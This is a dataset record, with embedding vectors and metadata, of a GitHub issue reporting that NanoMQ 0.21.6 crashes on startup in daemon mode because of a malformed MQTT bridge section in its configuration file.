-0.0009708093712106347, 0.014255193062126637, 0.0050253658555448055, -0.01441937405616045, -0.0398317351937294, -0.002753600711002946, -0.0053037600591778755, -0.02485557459294796, 0.009229826740920544, -0.002130783861503005, -0.0051574246026575565, -0.007156149949878454, 0.0019219883251935244, -0.0036137665156275034, 0.007323899772018194, -0.006485149264335632, -0.005978329572826624, -0.004693435039371252, 0.013184447772800922, 0.004233014304190874, 0.000854365760460496, 0.00016395792772527784, 0.013969660736620426, 0.016746461391448975, -0.0057499040849506855, -0.015918418765068054, 0.01978737860918045, -0.016232503578066826, 0.005385850556194782, -0.0035120456013828516, 0.009479667991399765, 0.0170748233795166, 0.00022530271962750703, -0.011592606082558632, -0.023570680990815163, 0.010200636461377144, -0.0079520707949996, -0.019487570971250534, -0.006067558657377958, -0.017288971692323685, -0.02402753196656704, 0.022699806839227676, 0.0021575524006038904, 0.014062458649277687, 0.003542383434250951, 0.0038439766503870487, -0.008787252008914948, 0.010164945386350155, 0.0019558952189981937, -0.021743273362517357, -0.0045934985391795635, 0.006966984830796719, -0.04251573979854584, 0.0015570425894111395, 0.010864499025046825, -0.010564690455794334, 0.01873091049492359, 0.02051548659801483, -0.01644665189087391, 0.00487546157091856, 0.00836609210819006, -0.0048040784895420074, 0.011257105506956577, 0.0022075206506997347, 0.030095089226961136, 0.04262995347380638, 0.014140980318188667, 0.020829571411013603, -0.01131421234458685, 0.010907328687608242, -0.0041473545134067535, 0.024241680279374123, -0.01262052170932293, 0.018630973994731903, 0.0006246016127988696, -0.0199158675968647, -0.00010958412167383358, 0.024298787117004395, -0.011592606082558632, 0.010543274693191051, -0.00803059246391058, -0.02839617431163788, 0.015318800695240498, 0.0008539195987395942, 0.004108094144612551, -0.01509037520736456, -0.00540012726560235, 0.0010885914089158177, 0.010743147693574429, 0.01409815065562725, 0.021657614037394524, 0.0024876990355551243, -0.014890502206981182, -0.00935117807239294, -0.010507583618164062, -0.012691904790699482, -0.004168769810348749, 0.0027232631109654903, 0.012256467714905739, 0.025340979918837547, 0.0015275970799848437, 0.005118164233863354, -0.00914416741579771, -0.009251242503523827, -0.0007071382715366781, -0.007156149949878454, 0.01470490638166666, 0.022442828863859177, 0.024541489779949188, -0.02151484787464142, 0.0037119181361049414, 0.014804842881858349, -0.017417462542653084, 0.023056721314787865, -0.0062460158951580524, 0.004522115457803011, 0.013705544173717499, -0.023684892803430557, -0.008694454096257687, 0.0039760353974998, 0.01083594560623169, -0.005782026331871748, 0.021900316700339317, -0.004200892057269812, -0.02387048862874508, -0.011428425088524818, 0.011585467495024204, 0.009722369723021984, 0.011228552088141441, 0.019102102145552635, 0.00024114083498716354, 0.022871125489473343, 0.010971573181450367, -0.004664881620556116, 0.02319948747754097, 0.02172899805009365 ]
null
null
null
null
null
null
null
null
null
[ "emqx", "nanomq" ]
**Describe the bug** Process nanomq not starting in **daemon** mode. Null in logs. Bridge not works and make crash. nanomq start --conf /etc/nanomq.conf -d **Expected behavior** Process nanomq starting **Actual Behavior** Proces not starting **To Reproduce** Reproduction config: mqtt { property_size = 32 max_packet_size = 10KB max_mqueue_len = 2048 retry_interval = 10s keepalive_multiplier = 1.25 max_inflight_window = 2048 max_awaiting_rel = 10s await_rel_timeout = 10s } listeners.tcp { bind = "0.0.0.0:1883" } listeners.ws { bind = "0.0.0.0:8083/mqtt" } http_server { port = 8081 limit_conn = 2 username = aqq password = aqq auth_type = basic jwt { public.keyfile = "/etc/certs/jwt/jwtRS256.key.pub" } } auth { allow_anonymous = false no_match = allow deny_action = ignore cache = { max_size = 32 ttl = 1m } password = {include "/etc/nanomq_pwd.conf"} } log { to = [file, console] level = error dir = "/home/pi/logs" file = "nanomq.log" rotation { size = 10MB count = 3 } } bridges.mqtt.emqx1 { server = "mqtt-tcp://146.XX.XX.XX:1883" proto_ver = 4 keepalive = 60s clean_start = false username = null password = aqq forwards = aqq { remote_topic = "" local_topic = "#" qos = 0 } ] max_parallel_processes = 4 max_send_queue_len = 128 max_recv_queue_len = 32 } **Environment Details** - NanoMQ version 0.21.6 arm64 - Rpi5 Rasbian bookworm **Additional context** When remove section bridges.mqtt.emqx1 process in daemon mode starting fine.
Bridge not works and make crash nanomq on start (wrong config syntax)
https://api.github.com/repos/nanomq/nanomq/issues/1705/comments
3
2024-03-10T21:37:26
2024-03-12T10:36:06Z
https://github.com/nanomq/nanomq/issues/1705
2,177,916,000
1,705
false
This is a GitHub Issue repo:nanomq owner:emqx Title : Bridge not works and make crash nanomq on start (wrong config syntax) Issue date: --- start body --- **Describe the bug** Process nanomq not starting in **daemon** mode. Null in logs. Bridge not works and make crash. nanomq start --conf /etc/nanomq.conf -d **Expected behavior** Process nanomq starting **Actual Behavior** Proces not starting **To Reproduce** Reproduction config: mqtt { property_size = 32 max_packet_size = 10KB max_mqueue_len = 2048 retry_interval = 10s keepalive_multiplier = 1.25 max_inflight_window = 2048 max_awaiting_rel = 10s await_rel_timeout = 10s } listeners.tcp { bind = "0.0.0.0:1883" } listeners.ws { bind = "0.0.0.0:8083/mqtt" } http_server { port = 8081 limit_conn = 2 username = aqq password = aqq auth_type = basic jwt { public.keyfile = "/etc/certs/jwt/jwtRS256.key.pub" } } auth { allow_anonymous = false no_match = allow deny_action = ignore cache = { max_size = 32 ttl = 1m } password = {include "/etc/nanomq_pwd.conf"} } log { to = [file, console] level = error dir = "/home/pi/logs" file = "nanomq.log" rotation { size = 10MB count = 3 } } bridges.mqtt.emqx1 { server = "mqtt-tcp://146.XX.XX.XX:1883" proto_ver = 4 keepalive = 60s clean_start = false username = null password = aqq forwards = aqq { remote_topic = "" local_topic = "#" qos = 0 } ] max_parallel_processes = 4 max_send_queue_len = 128 max_recv_queue_len = 32 } **Environment Details** - NanoMQ version 0.21.6 arm64 - Rpi5 Rasbian bookworm **Additional context** When remove section bridges.mqtt.emqx1 process in daemon mode starting fine. --- end body ---
1,992
[ -0.023979023098945618, 0.005758262239396572, -0.0014673356199637055, 0.0017163706943392754, 0.04079157114028931, 0.004514879081398249, -0.012835156172513962, 0.04222486913204193, -0.04061957821249962, 0.007216639816761017, -0.0144404461607337, -0.009538577869534492, -0.014934932813048363, -0.0002768050762824714, 0.01651155762374401, 0.060714371502399445, -0.0319911427795887, -0.009051257744431496, 0.00031666859285905957, 0.0035850289277732372, 0.004772872198373079, 0.009180254302918911, -0.00028845059568993747, 0.07292604446411133, 0.01040572114288807, 0.027977917343378067, -0.023721029981970787, -0.000498517882078886, -0.023377040401101112, -0.016841216012835503, -0.00034846982453018427, 0.0061990004032850266, -0.007134225219488144, 0.03184781223535538, 0.05007932335138321, -0.004937700927257538, 0.04835937172174454, 0.061861008405685425, -0.035947035998106, 0.0253263209015131, -0.016540223732590675, -0.018761830404400826, -0.03617636486887932, 0.006367412395775318, -0.013186313211917877, 0.02412235364317894, -0.004529211670160294, -0.006324413698166609, -0.03548838198184967, 0.004088473506271839, 0.02475300244987011, -0.031188497319817543, -0.03497239574790001, -0.039386942982673645, -0.016282230615615845, -0.008528104983270168, 0.005270942114293575, 0.009638908319175243, -0.019722137600183487, 0.004009642638266087, 0.0011627605417743325, 0.00872876588255167, -0.04259752482175827, 0.02673094905912876, -0.03477173298597336, 0.044403474777936935, -0.026171965524554253, -0.007754125632345676, -0.018704498186707497, 0.00571168027818203, -0.014275616966187954, 0.010936040431261063, 0.03451374173164368, -0.001649184967391193, 0.03591836988925934, -0.04615209624171257, 0.030328519642353058, 0.05523918569087982, -0.004880369175225496, 0.024667005985975266, -0.03242113068699837, 0.022388067096471786, -0.02667361870408058, 0.016267897561192513, 0.03353910148143768, -0.005403521936386824, -0.03396908938884735, -0.06661954522132874, -0.0013490888522937894, -0.01962180808186531, -0.0047012073919177055, 0.00986823532730341, -0.02964053861796856, -0.02850823476910591, 0.03147515654563904, -0.026114633306860924, -0.008040784858167171, -0.00862843543291092, -0.036090366542339325, -0.011588189750909805, -0.03276512026786804, -0.027375932782888412, -0.0030045444145798683, 0.02565597929060459, 0.022330734878778458, 0.008356109261512756, -0.0015040638390928507, -0.033166445791721344, 0.006800984498113394, 0.10147728025913239, 0.028149912133812904, -0.00347574008628726, -0.0286372322589159, -0.019535809755325317, -0.022044075652956963, -0.0014968973118811846, 0.003952310886234045, -0.009990065358579159, -0.046180762350559235, 0.009402414783835411, -0.007438800763338804, -0.027275601401925087, -0.05503852292895317, -0.03282245248556137, -0.04552144557237625, -0.012054010294377804, -0.02495366334915161, -0.03534505143761635, -0.009581576101481915, 0.00446113059297204, -0.01688421331346035, -0.021098101511597633, -0.015780577436089516, -0.020668111741542816, 0.022904053330421448, -0.03752366080880165, -0.028766227886080742, -0.003581445664167404, -0.0021463590674102306, -0.03282245248556137, 0.002465267200022936, -0.052401263266801834, 0.003995309583842754, -0.01871883124113083, -0.011588189750909805, 0.02730426751077175, 0.01676955074071884, -0.02995586395263672, -0.014289950020611286, 0.0073313033208251, -0.04211020469665527, -0.0007305325125344098, 0.04833070561289787, 0.05377722531557083, 0.0005056843510828912, -0.010620715096592903, -0.013415640220046043, -0.012097008526325226, -0.0012532372493296862, 0.0068654827773571014, -0.005055947694927454, -0.012032510712742805, -0.00396664347499609, -0.03230646625161171, 0.005227942951023579, 0.022115740925073624, -0.01810251548886299, 0.033424437046051025, -0.033223774284124374, 0.03540238365530968, -0.03623369336128235, 0.014906266704201698, 0.014669773168861866, 0.02526898868381977, -0.013157647103071213, 0.0075606307946145535, -0.01040572114288807, 0.0012245713733136654, -0.012097008526325226, 0.03156115487217903, 0.026071634143590927, -0.010291057638823986, 0.010842875577509403, 0.017428865656256676, 0.019249150529503822, 0.029167551547288895, -0.018417838960886, -0.02665928564965725, 0.052659254521131516, -0.005496685858815908, -0.00552176870405674, 0.011530857533216476, 0.009975732304155827, -0.050824638456106186, 0.004511295817792416, 0.010556217283010483, 0.0011959053808823228, 0.02082577534019947, -0.006156001705676317, -0.003905728692188859, 0.008492272347211838, 0.025053994730114937, -0.024108020588755608, -0.05435054376721382, -0.014605275355279446, 0.04348616674542427, 0.0005876509239897132, 0.015536916442215443, 0.025096993893384933, -0.03978826478123665, -0.007603629492223263, -0.022201737388968468, 0.03663501888513565, 0.011638354510068893, 0.0007887600804679096, 0.027390265837311745, -0.037294331938028336, -0.001891949214041233, -0.038756296038627625, -0.009531411342322826, 0.05085330456495285, -0.03798231482505798, -0.0041995542123913765, 0.01568024605512619, -0.03623369336128235, -0.005722430068999529, -0.03775298595428467, -0.005425021052360535, -0.03181914612650871, -0.007076893467456102, 0.050423312932252884, 0.004350049886852503, -0.017973517999053, 0.025354987010359764, -0.005869342479854822, -0.006564490497112274, -0.005403521936386824, 0.0005262880004011095, 0.00796911958605051, 0.03270778805017471, -0.0058048442006111145, 0.07172207534313202, -0.04119289666414261, -0.010154894553124905, -0.017041876912117004, 0.01712787337601185, 0.025039661675691605, -0.005872925743460655, -0.011831849813461304, -0.00590159185230732, 0.01352313719689846, 0.020524783059954643, 0.006525075063109398, 0.009982898831367493, -0.03497239574790001, -0.0037301499396562576, -0.021040769293904305, 0.007202306762337685, 0.0030995002016425133, 0.0005446520517580211, -0.0028916725423187017, 0.023133380338549614, -0.016081569716334343, 0.006431910675019026, -0.030873171985149384, -0.027332933619618416, -0.03313777968287468, 0.023334041237831116, 0.003190872725099325, 0.005124029237776995, 0.030758509412407875, -0.029669204726815224, -0.023706696927547455, 0.028020914644002914, -0.006353079807013273, -0.00234164553694427, 0.02845090441405773, 0.005575517192482948, -0.009667574428021908, 0.013408473692834377, 0.027476264163851738, 0.004643875639885664, 0.023276709020137787, -0.0029275049455463886, 0.002461683936417103, 0.014619608409702778, 0.03115983121097088, -0.01986546814441681, -0.03517305850982666, 0.008356109261512756, -0.03204847499728203, -0.010842875577509403, -0.04457547143101692, 0.015092595480382442, -0.0032016225159168243, 0.004281968344002962, 0.021298762410879135, 0.022760722786188126, 0.013351142406463623, 0.024208350107073784, -0.013601968996226788, -0.0061918338760733604, -0.0022699807304888964, -0.0032607458997517824, -0.03611903265118599, -0.010197892785072327, 0.0337684266269207, -0.0016438100719824433, -0.010140561498701572, -0.01886216178536415, 0.021499423310160637, -0.014848935417830944, -0.015164259821176529, -0.047700054943561554, -0.01130153052508831, -0.02958320640027523, 0.0018256594194099307, -0.005855009891092777, -0.009230419062077999, -0.005038031376898289, -0.037036340683698654, -0.06919948011636734, -0.047958046197891235, -0.009567243047058582, 0.018776163458824158, -0.04411681741476059, 0.020410118624567986, 0.024609673768281937, -0.056013163179159164, 0.003952310886234045, 0.011351695284247398, -0.03414108604192734, -0.02716093882918358, -0.029339546337723732, -0.03620503097772598, -0.02641562558710575, -0.0007058977498672903, 0.014132287353277206, -0.02419401705265045, 0.0005061322590336204, -0.015092595480382442, -0.00593384075909853, -0.007883122190833092, -0.04537811502814293, 0.04990732669830322, -0.02525465562939644, -0.01815984584391117, 0.015780577436089516, 0.06157434731721878, -0.026759615167975426, 0.0008586332551203668, -0.0028701729606837034, 0.0057833450846374035, 0.012756324373185635, 0.010599215514957905, -0.05317524075508118, -0.014605275355279446, -0.02393602579832077, 0.0037337332032620907, -0.01929214969277382, -0.016153233125805855, -0.04342883452773094, 0.04506279155611992, 0.02589963935315609, 0.015307589434087276, 0.006224083248525858, 0.005966090131551027, -0.03098783642053604, -0.003610111540183425, 0.005145528819411993, -0.004246136173605919, 0.026816947385668755, -0.027648258954286575, -0.036835677921772, -0.016267897561192513, -0.037924982607364655, 0.030500516295433044, 0.005227942951023579, -0.0497639998793602, 0.0040060593746602535, -0.004959200508892536, -0.010742545127868652, -0.01054188422858715, -0.030701177194714546, 0.028407905250787735, -0.023663699626922607, 0.005729596596211195, 0.0019170319428667426, -0.010749711655080318, 0.017357200384140015, -0.03219180181622505, 0.004264052491635084, -0.026358293369412422, -0.03153248876333237, 0.007940453477203846, 0.004249719437211752, -0.009402414783835411, -0.031016502529382706, 0.030013196170330048, 0.020969104021787643, 0.0023864360991865396, -0.01114386785775423, 0.029697870835661888, 0.025555647909641266, 0.012928320094943047, -0.020367121323943138, -0.02760525979101658, -0.009294917806982994, 0.019664805382490158, -0.006775901652872562, -0.010183560661971569, -0.03365376591682434, 0.0065859900787472725, -0.02723260223865509, 0.008234279230237007, 0.041049566119909286, 0.02362070046365261, 0.0014225451741367579, -0.02760525979101658, 0.014418946579098701, -0.00793328694999218, -0.0037301499396562576, 0.006904898211359978, -0.0008796847541816533, -0.0007144079427234828, 0.005747512448579073, -0.02710360661149025, 0.014848935417830944, 0.04093490168452263, 0.024853333830833435, 0.017443198710680008, -0.007137808483093977, 0.002563806250691414, 0.017658192664384842, -0.005034448578953743, -0.03021385706961155, -0.00003216515324311331, -0.011029204353690147, -0.007338469848036766, -0.019335148856043816, -0.02717527188360691, 0.0024598923046141863, -0.007861622609198093, -0.021298762410879135, 0.003593986853957176, 0.013867128640413284, -0.026057301089167595, -0.026071634143590927, -0.02317637950181961, -0.013609135523438454, 0.011659854091703892, 0.006858316250145435, -0.0501653216779232, -0.0506526418030262, -0.008750265464186668, -0.019521476700901985, -0.025698978453874588, 0.021026436239480972, 0.03789631649851799, 0.01374529767781496, -0.019091488793492317, -0.025670312345027924, 0.01345863938331604, -0.012620161287486553, 0.011674187146127224, 0.012498331256210804, 0.025211656466126442, -0.025340653955936432, 0.006632572039961815, -0.01973647065460682, 0.00343632441945374, 0.04190954193472862, 0.025756308808922768, 0.004479046445339918, -0.029411211609840393, 0.020137794315814972, -0.05199993774294853, -0.040734242647886276, 0.03351043537259102, -0.025612980127334595, -0.0036549021024256945, -0.030299853533506393, 0.011760184541344643, 0.016095900908112526, 0.0031192079186439514, -0.0007251576171256602, -0.010463052429258823, 0.029669204726815224, -0.0005249442765489221, 0.018460838124155998, 0.044088151305913925, -0.008040784858167171, -0.027146605774760246, -0.03955893963575363, -0.01783018931746483, -0.012347836047410965, 0.0053891888819634914, 0.030500516295433044, 0.03299444913864136, 0.0002989763452205807, 0.00503086531534791, -0.001560499775223434, 0.045406781136989594, 0.01643989235162735, -0.0018041599541902542, 0.008642768487334251, -0.030758509412407875, 0.03528771921992302, -0.021442091092467308, -0.033109113574028015, 0.030557846650481224, -0.05248725786805153, -0.000145121113746427, -0.014734271913766861, -0.027089273557066917, -0.023119047284126282, 0.013730965554714203, -0.023706696927547455, 0.03207714110612869, 0.04787205159664154, -0.004618792794644833, -0.02582797408103943, 0.007589296437799931, 0.01266316045075655, 0.01986546814441681, -0.025569980964064598, -0.008649935014545918, -0.006826066877692938, -0.004496962763369083, -0.025756308808922768, -0.02438034676015377, 0.01960747502744198, 0.009617408737540245, 0.03809697926044464, -0.00838477537035942, 0.013050150126218796, -0.009581576101481915, 0.026300961151719093, -0.027533594518899918, 0.0037946482188999653, 0.000567047274671495, 0.05543984845280647, -0.030815839767456055, 0.008836262859404087, 0.012935486622154713, -0.0038125645369291306, -0.027977917343378067, -0.0029902115929871798, 0.017815856263041496, -0.010140561498701572, 0.01330097671598196, -0.03720833733677864, 0.035144392400979996, -0.017041876912117004, -0.02817857824265957, -0.02743326500058174, 0.015966905280947685, 0.021341761574149132, 0.04861736297607422, 0.026702284812927246, 0.007918953895568848, 0.008936593309044838, 0.009517078287899494, -0.016224898397922516, -0.0048051211051642895, -0.015651579946279526, -0.026429958641529083, -0.03296578302979469, -0.0007260534330271184, -0.010104728862643242, 0.027017608284950256, -0.005009365733712912, -0.011373194865882397, 0.0025548480916768312, 0.008019285276532173, 0.025096993893384933, -0.017987851053476334, 0.008320276625454426, 0.02806391380727291, 0.00010688124893931672, 0.025297654792666435, 0.017185205593705177, 0.013558969832956791, 0.019249150529503822, -0.005385605618357658, 0.007718292996287346, 0.013953126035630703, -0.026487288996577263, 0.03021385706961155, -0.00838477537035942, 0.03078717365860939, -0.009789404459297657, 0.0028253826312720776, -0.0022448981180787086, 0.049420006573200226, -0.004138639196753502, -0.014562276192009449, 0.001672475947998464, 0.04139355570077896, -0.014934932813048363, -0.03027118742465973, 0.010814210399985313, -0.008635601960122585, 0.00291138025932014, -0.011394694447517395, 0.045865435153245926, -0.03631969168782234, -0.004858869593590498, -0.006915648002177477, 0.030758509412407875, -0.03540238365530968, 0.034886397421360016, 0.018331842496991158, -0.02989853173494339, -0.011473525315523148, 0.04982133209705353, 0.029310880228877068, 0.0010006190277636051, -0.008040784858167171, 0.031217163428664207, 0.02018079161643982, -0.04741339385509491, 0.03669235110282898, -0.03015652485191822, 0.00027299788780510426, 0.017170872539281845, -0.013487305492162704, -0.00487320264801383, 0.004833787214010954, 0.014949265867471695, -0.024738669395446777, 0.012992817908525467, -0.029697870835661888, -0.022316401824355125, 0.01676955074071884, 0.01695587858557701, 0.016468558460474014, -0.001839992357417941, -0.002465267200022936, -0.03864163160324097, 0.025741975754499435, 0.013071649707853794, -0.0255269818007946, -0.0016187274595722556, -0.04374416172504425, 0.013214979320764542, -0.021800415590405464, 0.028780560940504074, 0.022574394941329956, -0.00192778161726892, -0.01586657389998436, 0.00006477821443695575, 0.01040572114288807, 0.02984119951725006, 0.01031972374767065, -0.0071700578555464745, -0.013544636778533459, 0.04420281574130058, -0.021542422473430634, -0.0007403863710351288, -0.04956333711743355, -0.010964705608785152, 0.015149926766753197, -0.017228204756975174, 0.020653778687119484, -0.0028182161040604115, 0.00332524417899549, 0.013465805910527706, 0.027189604938030243, 0.023921692743897438, -0.000882372201886028, -0.04718406870961189, 0.01834617555141449, -0.035832371562719345, -0.0019654056522995234, -0.017672525718808174, 0.017228204756975174, 0.011244198307394981, -0.024108020588755608, -0.025354987010359764, -0.013093149289488792, 0.01676955074071884, -0.04211020469665527, 0.017557863146066666, -0.025440985336899757, -0.002717885421589017, 0.0016061861533671618, -0.011573856696486473, 0.012140007689595222, -0.039960261434316635, -0.00026381583302281797, -0.010692380368709564, 0.038870956748723984, -0.012355001643300056, -0.023276709020137787, -0.0011627605417743325, 0.0399889275431633, 0.00933074951171875, -0.009115755558013916, 0.016009904444217682, -0.017930518835783005, -0.008499438874423504, -0.0046116262674331665, 0.00687264883890748, 0.001419857726432383, 0.003783898428082466, 0.008879262022674084, -0.011824683286249638, 0.0012989235110580921, 0.017113540321588516, 0.005439354106783867, -0.010570550337433815, 0.018303176388144493, 0.016138900071382523, -0.0009513495024293661, 0.0018382007256150246, -0.02240240015089512, 0.011638354510068893, -0.019148819148540497, 0.03422708064317703, -0.025612980127334595, -0.01390296034514904, 0.00980373751372099, -0.011029204353690147, -0.007381468545645475, 0.013035817071795464, 0.004830203950405121, -0.00958874262869358, -0.0059983390383422375, -0.00024970684899017215, -0.02456667460501194, -0.01808818243443966, 0.002551264828070998, 0.029153218492865562, -0.02773425728082657, 0.015135593712329865, 0.012089842930436134, -0.004797954577952623, 0.030013196170330048, 0.012226005084812641, -0.023663699626922607, 0.004876785911619663, -0.014411780051887035, 0.03826897218823433, 0.011129534803330898, -0.028995556756854057, -0.03686434403061867, 0.007983452640473843, -0.031962476670742035, 0.00011858275684062392, 0.010097562335431576, 0.028680231422185898, -0.005657931789755821, 0.004020392429083586, 0.015393586829304695, 0.04841670021414757, 0.007818623445928097, -0.0011206574272364378, 0.011029204353690147, -0.003633402520790696, 0.012842322699725628, 0.007453133352100849, -0.010420054197311401, 0.035259053111076355, 0.016798216849565506, 0.0034381160512566566, 0.000534350227098912, -0.019335148856043816, -0.0028845060151070356, -0.002560222987085581, -0.009251918643712997, 0.0058084274642169476, -0.024724336341023445, -0.016554556787014008, 0.021857747808098793, -0.010334055870771408, -0.0257706418633461, -0.0066934870555996895, 0.005930257495492697, 0.045034125447273254, -0.03136049211025238, 0.027218271046876907, -0.01808818243443966, 0.01930648274719715, 0.024710003286600113, -0.020037462934851646, -0.001393879298120737, -0.021313095465302467, 0.022359400987625122, -0.014189619570970535, 0.013401307165622711, -0.01897682435810566, 0.024409012869000435, -0.03411241993308067, -0.007732626050710678, -0.020854441449046135, -0.011602521874010563, 0.026687951758503914, 0.004092056769877672, 0.0007990619051270187, 0.024007689207792282, 0.013093149289488792, -0.03832630440592766, 0.012140007689595222, -0.02545531839132309, -0.027648258954286575, -0.04036158323287964, 0.004661791492253542, -0.0563858225941658, 0.027777254581451416, 0.005435770843178034, 0.03156115487217903, 0.008735932409763336, 0.007302637677639723, 0.03766699135303497, -0.007256055250763893, -0.012806490063667297, -0.016110233962535858, -0.016583222895860672, -0.0075821299105882645, -0.005339023657143116, 0.01734286919236183, 0.0013589427107945085, -0.028680231422185898, 0.0031890810932964087, 0.0040060593746602535, -0.0068690660409629345, 0.0064928256906569, -0.005518185440450907, -0.00809094961732626, -0.033997755497694016, -0.007123475894331932, -0.016024237498641014, -0.017858853563666344, -0.023964690044522285, 0.024710003286600113, 0.02151375636458397, -0.017744190990924835, -0.022388067096471786, 0.01082137692719698, -0.0065895733423531055, 0.004009642638266087, -0.0061954171396791935, -0.031446490436792374, -0.014791603200137615, 0.0074746329337358475, -0.0035061975941061974, 0.0038125645369291306, -0.01669788546860218, 0.021126767620444298, 0.005489519331604242, 0.019320815801620483, 0.02106943540275097, 0.030357185751199722, -0.00910858903080225, -0.017787190154194832, 0.017170872539281845, 0.020080462098121643, 0.008463606238365173, 0.0024025605525821447, 0.016783883795142174, -0.003624444594606757, -0.01764385960996151, -0.01304298359900713, 0.012591496109962463, -0.0016536640468984842, -0.021298762410879135, -0.02558431401848793, -0.017944851890206337, -0.029726536944508553, -0.009667574428021908, -0.04093490168452263, -0.02012346126139164, 0.004529211670160294, -0.03600436821579933, 0.0008877470390871167, 0.003610111540183425, 0.021671418100595474, -0.0009907650528475642, -0.003662068396806717, -0.0000656740230624564, 0.003941561095416546, -0.04153688624501228, -0.025354987010359764, 0.02906722016632557, -0.006310080643743277, 0.006181084085255861, -0.03313777968287468, -0.010649381205439568, -0.010047397576272488, -0.0015721453819423914, -0.002443767851218581, -0.026988942176103592, -0.012964152731001377, -0.02564164623618126, 0.0008684871136210859, -0.024222683161497116, -0.06874082237482071, 0.015508251264691353, -0.010498885065317154, -0.001137677812948823, -0.030041860416531563, -0.015637246891856194, -0.007725459523499012, 0.005349773447960615, -0.05148395150899887, 0.010835709050297737, 0.009416747838258743, -0.03262179344892502, 0.005059530958533287, 0.02101210318505764, -0.02538365311920643, 0.04291284829378128, -0.01656888984143734, -0.0055862669833004475, -0.010240891948342323, -0.03325244039297104, 0.01335830893367529, -0.016783883795142174, 0.030185190960764885, -0.03566037863492966, 0.03783898428082466, -0.005070280749350786, 0.01783018931746483, -0.02419401705265045, -0.014082122594118118, -0.021055102348327637, 0.004324967507272959, -0.040017593652009964, 0.0036477355752140284, 0.026114633306860924, -0.0023291041143238544, 0.018704498186707497, 0.003006336046382785, 0.006163168232887983, -0.04193820804357529, 0.01664055325090885, 0.016583222895860672, 0.013386974111199379, -0.036778345704078674, -0.019894132390618324, 0.014805936254560947, 0.020797109231352806, -0.01297848578542471, 0.007005228661000729, 0.05148395150899887, 0.007460299879312515, -0.0073886350728571415, -0.042626190930604935, -0.012612994760274887, -0.03769565746188164, -0.0012971318792551756, 0.015293256379663944, -0.03563171252608299, 0.012226005084812641, 0.019449811428785324, -0.02571330964565277, -0.022746389731764793, -0.018460838124155998, -0.01221883948892355, 0.015393586829304695, 0.0257706418633461, 0.02495366334915161, -0.010721045546233654, -0.0038376471493393183, 0.007531964685767889, 0.028422238305211067, -0.009280584752559662, -0.0015828950563445687, 0.018819162622094154, 0.007395801600068808, 0.011086535640060902, -0.013981792144477367, -0.0025691811461001635, -0.026960277929902077, -0.033223774284124374, -0.0033091194927692413, -0.0034470742102712393, -0.03353910148143768, 0.004568627569824457, -0.0022538562770932913, -0.03161848708987236, 0.021413424983620644, -0.02741893194615841, 0.015049596317112446, -0.028680231422185898, -0.014003290794789791, 0.018503837287425995, -0.008442106656730175, -0.0006373682990670204, 0.015035263262689114, 0.004790788050740957, -0.0022520646452903748, -0.0045901271514594555, 0.030672511085867882, 0.029411211609840393, 0.016095900908112526, 0.002216232242062688, 0.0016267896862700582, -0.03193381056189537, -0.02836490608751774, 0.013558969832956791, 0.028092579916119576, -0.011609688401222229, -0.01406062301248312, 0.013888627290725708, 0.004453964065760374, 0.0065895733423531055, -0.015307589434087276, -0.008241445757448673, -0.006775901652872562, 0.02716093882918358, 0.03382575884461403, -0.02406502142548561, -0.0047012073919177055, 0.012956986203789711, 0.0016877047019079328, 0.014325782656669617, -0.031188497319817543, 0.03806831315159798, 0.015794910490512848, 0.01860416866838932, -0.022244736552238464, -0.006102253217250109, 0.01431861612945795, 0.03511572629213333, -0.037924982607364655, -0.026057301089167595, 0.02849390357732773, 0.005134779028594494, -0.008829096332192421, -0.002085444051772356, 0.006564490497112274, 0.005865759216248989, -0.017658192664384842, -0.0055862669833004475, 0.02171441726386547, -0.029783867299556732, -0.014196786098182201, -0.002587097231298685, 0.021126767620444298, 0.006428327411413193, -0.005991172511130571, 0.008771765045821667, -0.00952424481511116, 0.0023076047655194998, -0.013895793817937374, -0.024165352806448936, 0.016396893188357353, 0.0009079027222469449, 0.021241430193185806, -0.007983452640473843, 0.03009919263422489, -0.03459974005818367, -0.00748896598815918, 0.004049058072268963, -0.028852226212620735, -0.014669773168861866, 0.022316401824355125, 0.015565582551062107, -0.015852240845561028, -0.034886397421360016, 0.015364921651780605, 0.02273205667734146, 0.0032320800237357616, -0.01707054302096367, -0.019894132390618324, 0.005360522773116827, 0.012512664310634136, 0.012269004248082638, -0.002128442982211709, 0.030127858743071556, -0.00563284894451499, 0.009373748674988747, 0.03889962285757065, 0.01040572114288807, -0.019392479211091995, 0.011409027501940727, -0.010928873904049397, -0.000053244664741214365, -0.023635033518075943, -0.0026677201967686415, 0.001400150009430945, 0.025311987847089767, -0.02850823476910591, -0.009402414783835411, -0.02728993445634842, -0.006113002542406321, -0.00809094961732626, -0.014641107060015202, -0.014304283075034618, -0.009925567544996738, -0.0033664514776319265, 0.021370427682995796, 0.00964607484638691, -0.018776163458824158, 0.0005137466359883547, 0.06610356271266937, 0.007639461662620306, 0.006937147118151188, 0.004421714693307877, -0.022072741761803627, -0.023448703810572624, 0.0038125645369291306, -0.004213886801153421, -0.01606723666191101, -0.0039200615137815475, -0.0051096961833536625, 0.019980130717158318, 0.007417301181703806, 0.008714432828128338, 0.002886297646909952, 0.009595909155905247, -0.006643321830779314, 0.005708097014576197, 0.00525302579626441, -0.018045183271169662, -0.02456667460501194, 0.0033073280937969685, 0.02266039326786995, -0.0002895703655667603, 0.002701760968193412, 0.024967996403574944, -0.007309804204851389, -0.008241445757448673, -0.03351043537259102, -0.002397185657173395, 0.004790788050740957, 0.0037623990792781115, -0.02127009630203247, -0.0008855074993334711, 0.024982329457998276, 0.006808150559663773, -0.016912879422307014, 0.030701177194714546, 0.0045077125541865826, 0.00032473087776452303, -0.002859423402696848, -0.015465252101421356, 0.0395016074180603, 0.0007699481211602688, 0.006403245031833649, 0.009216086007654667, -0.001315048080869019, -0.03543104976415634, -0.03230646625161171, -0.00612375233322382, -0.017944851890206337, -0.04156555235385895, -0.02760525979101658, -0.006066420581191778, 0.024165352806448936, 0.02610030025243759, 0.010592048987746239, -0.005478769540786743, 0.01314331404864788, -0.000454175315098837, -0.026988942176103592, 0.013121814467012882, 0.0020048213191330433, -0.010412887670099735, 0.0018346174620091915, -0.0006136293523013592, -0.04024692252278328, 0.009517078287899494, -0.031647153198719025, -0.0076967934146523476, 0.0031407075002789497, 0.003783898428082466, -0.028866559267044067, 0.0029436293989419937, 0.0029454210307449102, 0.006363829597830772, 0.02667361870408058, 0.012376501224935055, -0.017572196200489998, -0.01828884333372116, -0.0017038292717188597, 0.019951464608311653, -0.0038913956377655268, -0.00487320264801383, 0.005493102595210075, 0.023219376802444458, -0.02405068837106228, 0.013695132918655872, 0.00563284894451499, -0.011810350231826305, 